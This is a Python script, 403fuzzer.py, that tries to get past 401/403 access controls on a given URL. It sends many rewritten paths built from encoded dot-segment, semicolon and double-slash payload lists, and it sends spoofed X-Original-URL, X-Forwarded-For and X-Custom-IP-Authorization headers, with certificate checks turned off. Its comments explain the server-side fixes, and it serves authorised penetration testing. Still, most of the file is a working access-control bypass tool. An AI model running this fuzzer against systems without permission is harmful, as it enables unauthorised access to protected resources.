403fuzzer.py
from datetime import date, datetime
from urllib.parse import urlparse, urlunparse
import sys, argparse, logging, requests
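# Silence urllib3 warnings, which include the InsecureRequestWarning that every
# request in this script would otherwise raise because it is sent with
# verify=False. With verification off the server certificate is not validated,
# so the responses being compared are not authenticated.
requests.packages.urllib3.disable_warnings()

parser = argparse.ArgumentParser(
    description="use this script to fuzz endpoints that return a 401/403"
)
parser.add_argument('--url', '-u', action="store", default=None, dest='url',
                    help="Specify the target URL")
args = parser.parse_args()

# Invoked with no arguments at all: show usage and stop before any request.
if len(sys.argv) <= 1:
    parser.print_help()
    print()
    # sys.exit() instead of the bare exit() helper: exit() is injected by the
    # `site` module and is missing under `python -S` and in frozen builds.
    sys.exit()

# Baseline request headers shared by every probe; the User-Agent presents the
# script as a desktop Firefox build.
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "DNT": "1",
    "Connection": "close",
    "Upgrade-Insecure-Requests": "1",
}

# Strings substituted for the "/" in front of a path segment. They are
# dot-segments, ";" path parameters and duplicate slashes, plain and in single
# and double percent-encoding. A response that changes under one of them points
# at an access rule that matches the raw path while the application behind it
# matches a normalised one; normalising once, before authorisation, closes it.
prefixPayloads = [
    '/.;/', '/..;/', '//', '/./', '/.//', '/..//', '/%2e%3b/', '/%2e%2e%3b/',
    '%2f/', '/%2f', '%2f%2f', '/%2e/', '/%2e%2f/', '/%2e%2e%2f/', '/%252e%253b/',
    '/%252e%252e%253b/', '%252f%252f', '%252f/', '/%252f', '/%252e/', '/%252e%252f/',
    '/%252e%252e%252f/',
]

# Strings appended to a path segment (parameter marker, fake extensions,
# fragment marker, encoded trailing space).
suffixPayloads = [
    ';', '.html', '.json', '#', '/%20',
]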
def preAndPost(parsed):
    """Return the target URL rewritten once per (path segment, payload) pair.

    Every candidate starts from the module-level ``path`` and ``pathPieces``
    (not from ``parsed.path``); ``parsed`` only supplies the other URL
    components. All prefix variants come first, then all suffix variants,
    each group ordered by segment and then by payload.

    NOTE: ``str.replace`` rewrites every occurrence of the segment text, so a
    segment that is a substring of another segment (or that repeats) is
    mutated in more than one place within a single candidate.

    Args:
        parsed: the ``urlparse`` result for the target URL.

    Returns:
        list[str]: candidate URLs, one per segment/payload combination.
    """
    def rebuild(new_path):
        # Swap only the path; scheme, host, query etc. stay as given.
        return urlunparse(parsed._replace(path=new_path))

    # Payload takes the place of the "/" in front of the segment.
    prefixed = [
        rebuild(path.replace('/' + piece, prefix + piece))
        for piece in pathPieces
        for prefix in prefixPayloads
    ]

    # Payload is glued onto the end of the segment.
    suffixed = [
        rebuild(path.replace(piece, piece + suffix))
        for piece in pathPieces
        for suffix in suffixPayloads
    ]

    return prefixed + suffixed
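def sendHeaders(url, path):
    """Request ``url`` three times, each time with one extra request header.

    The headers are ``X-Original-URL`` (set to ``path``), ``X-Forwarded-For``
    and ``X-Custom-IP-Authorization`` (both set to ``127.0.0.1``). The status
    code and body length of each response are printed for comparison with the
    unmodified request. A result that changes with one of these headers means
    some component trusts a client-supplied value for routing or for the
    source address; the edge proxy should strip or overwrite such headers.

    Args:
        url: the unmodified target URL.
        path: the target's path, sent as the ``X-Original-URL`` value.

    Raises:
        requests.exceptions.RequestException: on connection failure or when
            the server does not answer within the timeout.
    """
    probes = (
        ("X-Original-URL", path),
        ("X-Forwarded-For", "127.0.0.1"),
        ("X-Custom-IP-Authorization", "127.0.0.1"),
    )
    for name, value in probes:
        # Work on a copy so the shared module-level `headers` dict is never
        # left carrying a probe header if a request raises part-way through.
        probe_headers = dict(headers)
        probe_headers[name] = value
        # verify=False: the certificate is not checked. timeout: requests has
        # no default, so an unresponsive host would otherwise block forever.
        resp = requests.get(url, headers=probe_headers, verify=False, timeout=10)
        print("Response code: {} Response length: {} Header: {}: {}\n".format(
            resp.status_code, len(resp.text), name, value))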
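def sendFinalPayloads(finalUrls):
    """GET every candidate URL and print its status code and body length.

    Args:
        finalUrls: iterable of candidate URL strings.

    Raises:
        requests.exceptions.RequestException: on connection failure or when
            the server does not answer within the timeout.
    """
    for candidate in finalUrls:
        # NOTE: urlparse moves a ";params" part of the last segment and any
        # "#fragment" out of .path, so the path printed below can be shorter
        # than the URL that was requested.
        shown_path = urlparse(candidate).path
        # verify=False: the certificate is not checked. timeout: requests has
        # no default, so an unresponsive host would otherwise block forever.
        resp = requests.get(candidate, headers=headers, verify=False, timeout=10)
        print("Response code: {} Response length: {} Path: {}\n".format(
            resp.status_code, len(resp.text), shown_path))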
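url = args.url
parsed = urlparse(url)

# Reject anything that is not an absolute http(s) URL up front. Without a
# scheme urlparse puts the host name into .path, and the first request would
# fail inside requests with a traceback instead of a usage message.
if parsed.scheme not in ("http", "https") or not parsed.netloc:
    parser.error("--url must be an absolute http:// or https:// URL")

path = parsed.path
# Non-empty path segments; joining on a space and re-splitting also breaks a
# segment apart at any literal whitespace it contains.
pathPieces = ' '.join(parsed.path.split('/')).split()
finalUrls = preAndPost(parsed)

# Header-based probes against the original URL first, then the path variants.
sendHeaders(url, path)
sendFinalPayloads(finalUrls)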